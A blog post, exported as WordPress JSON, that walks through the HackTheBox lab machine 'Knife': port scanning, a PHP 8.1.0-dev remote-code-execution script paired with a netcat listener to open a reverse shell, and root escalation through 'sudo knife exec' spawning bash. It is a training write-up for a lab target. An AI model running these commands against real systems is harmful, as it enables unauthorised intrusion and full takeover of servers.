{"id":670,"date":"2021-10-22T21:42:05","date_gmt":"2021-10-22T17:42:05","guid":{"rendered":"https:\/\/www.buildingtheitguy.com\/\/?p=670"},"modified":"2021-10-23T09:17:23","modified_gmt":"2021-10-23T05:17:23","slug":"htb-knife-walkthrough","status":"publish","type":"post","link":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/","title":{"rendered":"HTB Knife Walkthrough"},"content":{"rendered":"\n

Knife is a Linux machine, we are going to attack by scanning, enumerating, privilege escalation, and gaining access to the server.<\/p>\n\n\n\n

IP: 10.10.10.242<\/strong><\/p>\n\n\n\n

Connect HTB VPN and make sure you can reach this machine. If you want to connect HTP VPN check here<\/a><\/p>\n\n\n\n

\"Ping<\/figure>\n\n\n\n

Enumeration<\/h2>\n\n\n\n

Scan the host by using the NMAP scanner.<\/p>\n\n\n

\nnmap 10.10.10.242 (Basic Scan)\nnmap -sV 10.10.10.242 -p1-1000 (Version Detection)\n<\/pre><\/div>\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
we can see there are two ports open SSH and HTTP, which means this is the webserver<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
This webpage looks like static content. it\u2019s just one page so brute force login or SQL injection methods not going to be useful. Let\u2019s go for a directory traversal attack scan to see any hidden page or a gobuster to brute force.<\/p>\n\n\n\n
\"\"
Gobuster Enumneration<\/figcaption><\/figure>\n\n\n\n
\"\"
Nikto Web Scan<\/figcaption><\/figure>\n\n\n\n
\"HackTheBox:
Curl Scan<\/figcaption><\/figure>\n\n\n\n
This does not look like WordPress and directory traversal exploit neither to find.<\/p>\n\n\n\n
Let’s Open Burp Suite and see if any new we can see,<\/p>\n\n\n\n
\"HackTheBox:
Burp Suite Community Version<\/figcaption><\/figure>\n\n\n\n
We found some weird dev version of PHP\/8.1.0-dev, research it, and found this is vulnerable to Remote Code Execution. We can download this Python script to exploit it. Also, we can find reverse shell and backdoor scripts for RCE here<\/a><\/p>\n\n\n\n
<\/p>\n\n\n\n
\"HackTheBox:
Exploit DB<\/figcaption><\/figure>\n\n\n
\n#Open listing port on one terminal by entering below command\nnc -lvnp 4444\n\n#Open revshell on another terminal\npython3 revshell_php_8.1.0-dev.py http:\/\/10.10.10.242 (Your-IP) 4444\n\n<\/pre><\/div>\n\n\n
\"HackTheBox:
Terminal 1<\/figcaption><\/figure><\/div>\n\n\n\n
\"\"
Terminal 2<\/figcaption><\/figure>\n\n\n\n
Now we can see that user flag in \/home\/james\/user.txt<\/p>\n\n\n\n
\"HackTheBox:<\/figure>\n\n\n\n
Now check if James user has any privileges to explore more.<\/p>\n\n\n
\nsudo -l\n<\/pre><\/div>\n\n\n
\"HackTheBox:<\/figure>\n\n\n\n
When we  look at  knife exec options<\/a> and it allows us to execute our commands via knife exec [SCRIPT] (options)<\/code>. <\/p>\n\n\n
\nsudo \/usr\/bin\/knife exec -E "exec \\"\/bin\/bash\\";"\n\n<\/pre><\/div>\n\n\n
\"HackTheBox:<\/figure>\n\n\n\n
\"HackTheBox:<\/figure>\n\n\n\n
That’s it, we pwned one of the Linux servers running vulnerable PHP.<\/p>\n","protected":false},"excerpt":{"rendered":"
Knife is a Linux machine, we are going to attack by scanning, enumerating, privilege escalation, and gaining access to the server. IP: 10.10.10.242 Connect HTB VPN and make sure you can reach this machine. If you want to connect HTP VPN check here Enumeration Scan the host by using the NMAP scanner. we can see […]<\/p>\n","protected":false},"author":1,"featured_media":697,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[33],"tags":[55],"class_list":["post-670","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-hackthebox-linux"],"featured_image_src":"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg","author_info":{"display_name":"Mohamed Asath","author_link":"https:\/\/www.buildingtheitguy.com\/index.php\/author\/asathwebtieradmin\/"},"yoast_head":"\nHTB Knife Walkthrough - Building THE IT GUY<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HTB Knife Walkthrough - Building THE IT GUY\" \/>\n<meta property=\"og:description\" content=\"Knife is a Linux machine, we are going to attack by scanning, enumerating, privilege escalation, and gaining access to the server. IP: 10.10.10.242 Connect HTB VPN and make sure you can reach this machine. If you want to connect HTP VPN check here Enumeration Scan the host by using the NMAP scanner. we can see […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/\" \/>\n<meta property=\"og:site_name\" content=\"Building THE IT GUY\" \/>\n<meta property=\"article:published_time\" content=\"2021-10-22T17:42:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-23T05:17:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1400\" \/>\n\t<meta property=\"og:image:height\" content=\"787\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Mohamed Asath\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mohamed Asath\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/\"},\"author\":{\"name\":\"Mohamed Asath\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/#\\\/schema\\\/person\\\/cce03fcda4c40ccf57ab3844ca707561\"},\"headline\":\"HTB Knife Walkthrough\",\"datePublished\":\"2021-10-22T17:42:05+00:00\",\"dateModified\":\"2021-10-23T05:17:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/\"},\"wordCount\":247,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/knife-HTB.jpeg\",\"keywords\":[\"hackthebox linux\"],\"articleSection\":[\"Cyber Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/\",\"url\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/\",\"name\":\"HTB Knife Walkthrough - Building THE IT GUY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/knife-HTB.jpeg\",\"datePublished\":\"2021-10-22T17:42:05+00:00\",\"dateModified\":\"2021-10-23T05:17:23+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/#\\\/schema\\\/person\\\/cce03fcda4c40ccf57ab3844ca707561\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/knife-HTB.jpeg\",\"contentUrl\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/wp-content\\\/uploads\\\/2021\\\/10\\\/knife-HTB.jpeg\",\"width\":1400,\"height\":787,\"caption\":\"HTB Knife Walkthrough Building THE IT GUY\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/htb-knife-walkthrough\\\/cybersecurity\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"HTB Knife Walkthrough\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/#website\",\"url\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/\",\"name\":\"Building THE IT GUY\",\"description\":\"Making Everyone's Life Easier\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/#\\\/schema\\\/person\\\/cce03fcda4c40ccf57ab3844ca707561\",\"name\":\"Mohamed Asath\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/ab17cc6285a5051affe4181f53011c89cc055de9416bcc44b3e2771be318d870?s=96&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/ab17cc6285a5051affe4181f53011c89cc055de9416bcc44b3e2771be318d870?s=96&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/ab17cc6285a5051affe4181f53011c89cc055de9416bcc44b3e2771be318d870?s=96&r=g\",\"caption\":\"Mohamed Asath\"},\"description\":\"Turning IT Challenges into Opportunities\",\"sameAs\":[\"https:\\\/\\\/www.buildingtheitguy.com\"],\"url\":\"https:\\\/\\\/www.buildingtheitguy.com\\\/index.php\\\/author\\\/asathwebtieradmin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HTB Knife Walkthrough - Building THE IT GUY","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/","og_locale":"en_US","og_type":"article","og_title":"HTB Knife Walkthrough - Building THE IT GUY","og_description":"Knife is a Linux machine, we are going to attack by scanning, enumerating, privilege escalation, and gaining access to the server. IP: 10.10.10.242 Connect HTB VPN and make sure you can reach this machine. If you want to connect HTP VPN check here Enumeration Scan the host by using the NMAP scanner. we can see […]","og_url":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/","og_site_name":"Building THE IT GUY","article_published_time":"2021-10-22T17:42:05+00:00","article_modified_time":"2021-10-23T05:17:23+00:00","og_image":[{"width":1400,"height":787,"url":"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg","type":"image\/jpeg"}],"author":"Mohamed Asath","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Mohamed Asath","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#article","isPartOf":{"@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/"},"author":{"name":"Mohamed Asath","@id":"https:\/\/www.buildingtheitguy.com\/#\/schema\/person\/cce03fcda4c40ccf57ab3844ca707561"},"headline":"HTB Knife Walkthrough","datePublished":"2021-10-22T17:42:05+00:00","dateModified":"2021-10-23T05:17:23+00:00","mainEntityOfPage":{"@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/"},"wordCount":247,"commentCount":0,"image":{"@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#primaryimage"},"thumbnailUrl":"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg","keywords":["hackthebox linux"],"articleSection":["Cyber Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/","url":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/","name":"HTB Knife Walkthrough - Building THE IT GUY","isPartOf":{"@id":"https:\/\/www.buildingtheitguy.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#primaryimage"},"image":{"@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#primaryimage"},"thumbnailUrl":"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg","datePublished":"2021-10-22T17:42:05+00:00","dateModified":"2021-10-23T05:17:23+00:00","author":{"@id":"https:\/\/www.buildingtheitguy.com\/#\/schema\/person\/cce03fcda4c40ccf57ab3844ca707561"},"breadcrumb":{"@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#primaryimage","url":"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg","contentUrl":"https:\/\/www.buildingtheitguy.com\/wp-content\/uploads\/2021\/10\/knife-HTB.jpeg","width":1400,"height":787,"caption":"HTB Knife Walkthrough Building THE IT GUY"},{"@type":"BreadcrumbList","@id":"https:\/\/www.buildingtheitguy.com\/index.php\/htb-knife-walkthrough\/cybersecurity\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.buildingtheitguy.com\/"},{"@type":"ListItem","position":2,"name":"HTB Knife Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.buildingtheitguy.com\/#website","url":"https:\/\/www.buildingtheitguy.com\/","name":"Building THE IT GUY","description":"Making Everyone's Life Easier","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.buildingtheitguy.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.buildingtheitguy.com\/#\/schema\/person\/cce03fcda4c40ccf57ab3844ca707561","name":"Mohamed Asath","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/ab17cc6285a5051affe4181f53011c89cc055de9416bcc44b3e2771be318d870?s=96&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/ab17cc6285a5051affe4181f53011c89cc055de9416bcc44b3e2771be318d870?s=96&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ab17cc6285a5051affe4181f53011c89cc055de9416bcc44b3e2771be318d870?s=96&r=g","caption":"Mohamed Asath"},"description":"Turning IT Challenges into Opportunities","sameAs":["https:\/\/www.buildingtheitguy.com"],"url":"https:\/\/www.buildingtheitguy.com\/index.php\/author\/asathwebtieradmin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/posts\/670","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/comments?post=670"}],"version-history":[{"count":20,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/posts\/670\/revisions"}],"predecessor-version":[{"id":710,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/posts\/670\/revisions\/710"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/media\/697"}],"wp:attachment":[{"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/media?parent=670"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/categories?post=670"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.buildingtheitguy.com\/index.php\/wp-json\/wp\/v2\/tags?post=670"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}